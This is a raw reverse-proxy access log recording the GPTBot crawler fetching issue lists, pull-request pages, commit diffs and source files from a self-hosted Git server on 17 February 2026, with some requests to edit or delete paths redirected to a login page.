compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:16:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10120] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:16:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10115] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:16:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10108] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:16:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:16:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:16:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10118] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:16:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:16:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:16:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10120] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:16:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10123] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:16:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10109] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:16:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9944] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:16:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10106] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:16:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10112] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:16:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10117] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:16:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10123] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:16:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10121] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:16:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:16:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:16:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:16:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:16:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:16:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9934] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:16:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9935] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:16:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9938] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:16:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9938] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:16:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:16:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:16:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:16:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:16:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:16:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:16:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:16:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:16:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 20820] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:16:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 20830] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:16:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 11763] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" +[17/Feb/2026:16:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fnginx%2fproxy_host%2f4.conf" [Client 74.7.227.38] [Length 23772] [Gzip 4.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fnginx%2fproxy_host%2f1.conf" [Client 74.7.227.38] [Length 23968] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fnginx%2fproxy_host%2f2.conf" [Client 74.7.227.38] [Length 23765] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2fnginx%2fproxy_host%2f3.conf" [Client 74.7.227.38] [Length 23997] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fnginx%2fproxy_host%2f3.conf" [Client 74.7.227.38] [Length 24761] [Gzip 5.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11106] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11843] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11846] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11894] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:58:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" +[17/Feb/2026:16:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj" +[17/Feb/2026:16:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 37569] [Gzip 11.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" +[17/Feb/2026:16:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 12400] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" +[17/Feb/2026:16:58:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" +[17/Feb/2026:16:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj" +[17/Feb/2026:16:58:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" +[17/Feb/2026:16:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcConnectionTest/obj" +[17/Feb/2026:16:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 9810] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" +[17/Feb/2026:16:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11897] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 25653] [Gzip 7.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:16:58:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:16:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:16:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29848] [Gzip 12.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 